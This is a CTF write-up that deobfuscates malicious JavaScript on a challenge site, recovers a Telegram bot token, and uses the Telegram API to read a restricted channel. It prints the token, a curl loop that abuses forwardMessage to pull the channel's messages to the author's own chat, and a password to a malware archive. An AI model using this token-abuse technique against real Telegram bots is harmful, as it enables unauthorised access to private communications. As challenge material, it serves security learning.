Tales for the Brave

Personal Rating: Hard

Suspicious Website

We start off with a website:

Challenge Website

Upon inspecting the website source code, a cryptography JS library seems to be used. This is odd and does not seem to fit the apparent purpose of the web page. https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.9-1/crypto-js.js

In the body, there is another script loaded. As expected, it is obfuscated JS. http://83.136.254.140:51845/js/index.js

Obfuscated Javascript

Javascript Deobfuscation

The large blob of data is likely encrypted, which would match that a crypto library is imported.

Encrypted Blob

I used noedjs to get the result of the first operations, which made the script much more readable already.

console.log(btoa(unescape("<escaped_hexstring>")))

I then replaced the results accordingly

Unescaped Hex String

You can already see that the first string might be the cipher, the second the key and the third the IV.

Cypher

Initialization Vector

Using these strings to decrypt the blob was successful in CyberChef.

Decrypted Blob

I cleaned up the start of the original script to start deobfuscating that before inserting the decrypted part.

Beautified Script Start

I suspected that the function _$_9b39 just generates the input for the function that is inside the AES stream. Duplciate semicholi can be removed as they have no function.

I wrote a test script that outputs the result for the indices 0-5 (of the array that is returned by _$_9b39).

Deobfuscation Results

Given these strings, I replaced the entire CryptoJS cipher part with the decrypted version from Cyberchef. I also beautified it. It contains further of these functions that can easily be replaced.

Function Outputs to Replace

Again, I wrote a test script for each of these functions to make it obsolete:

Function Test Script

Function Test Script Results

"outputgen[12] = log" is never used, but I replaced the other occurrences and removed the function.

And another one, this time with more automation:

Next Test Script

The results were promising:

Script Results

"outgen[21] = log" is again never used.

This function was the last one that looked quite obfuscated. Unraveling it was simple with a test script again.

Test Script

0p3r4t10n_4PT_Un10n was the resulting string. This however was not the flag. I moved on to potentially see the Telegram Chat that the messages are sent to.

Now this function is interesting. It takes a secret key (which is later defined as the part of the mail before the @ sign, that you type in at the website.)

Remaining Dubious Function

Understanding the decryption function, the cipher and key could be used to get the result:

Decryption Result

This turned out to contain a Telegram API key 7767830636:AAF5Fej3DZ44ZZQbMrkn8gf7dQdYb3eNxbc

Exploring the Telegram API

The value of descriptionField is converted to an integer with a base of 10 and that is parsed to the function as second input. input2 is then used as the chat_id in the telegram link. The final link will look like this, given that input2 is 10. However, since this is the content of the description field, taken as decimal, we do not know it. We have the API key though, so we might be able to query the Telegram API and list all chats. You can retrieve information from the Telegram API, using the getUpdates endpoint:

https://api.telegram.org/bot7767830636:AAF5Fej3DZ44ZZQbMrkn8gf7dQdYb3eNxbc/getUpdatesapi.telegram.org

Telegram Link

Telegram Bot Access

Testing through the IDs, the coco caca ID results in something interesting:

https://api.telegram.org/bot7767830636:AAF5Fej3DZ44ZZQbMrkn8gf7dQdYb3eNxbc/forwardMessage?chat_id=6152346598&from_chat_id=-1002496072246&message_id=5api.telegram.org

Telegram API Query

Suspicious Telegram Chat

This is the chatID of the "Operation Eldoria" channel: -1002496072246

This is the forward origin of the invite: -1002496072246

The bot we have the key of, bot7767830636, is called OperationEldoriaBot. This invite link can be found, but seems invalid: https://t.me/+_eYUKZwn-p45OGNk

Invalid Invite Link

Requesting the Operation Eldoria Chat is not possible due to missing access rights.

No Direct Access To Telegram Chat

After testing and research, we found out that you can join the Telegram bot and use this to forward messages to your Chat ID! We could forward the messages of the OperationEldoria chat to our private devices, even though we could not join the chat directly.

Telegram Bot Access

I wrote this script to forward the first 15 messages to my telegram chat:

for i in {1..15}; do curl 'https://api.telegram.org/bot7767830636:AAF5Fej3DZ44ZZQbMrkn8gf7dQdYb3eNxbc/forwardMessage?chat_id=<redacted>&from_chat_id=-1002496072246&message_id='$i | jq >> messages.txt; done

Forwarded Telegram Messages

We retrieved a zip file and a password for it dr4g0nsh34rtb3l0ngst0m4l4k4r

Malware Analysis

The zip file could be downloaded and extracted with the password. The content was "Brave.exe".

From this I suspect that the program is a modified version of the Brave browser, since it seems too large for just a hacking tool.

strings Brave.exe | wc -l
34667

file Brave.exe
Brave.exe: PE32+ executable for MS Windows 6.00 (console), x86-64, 8 sections

Opening the file in avalonilspy did not work. I started a Windows VM to get more possibilities for Windows-native analysis. Submitting the file to Virustotal shew that it was known and detected as malware.

VirusTotal Malware Detection

Unfortunately, we thought that the malware would be a dead end, since it was known to VirusTotal and in the analysis results was nothing interesting. We moved on with querying the Telegram API. It was possible to list the administrators of the OperationEldoria group and get some more information on other users, but that did not help us.

I even wanted to try dynamic analysis in the Windows VM, but Windows, of course, decided to prevent its network connection from working.

After the CTF, I saw that you just had to do some dynamic analysis and investigate the requests that the malware does in Wireshark.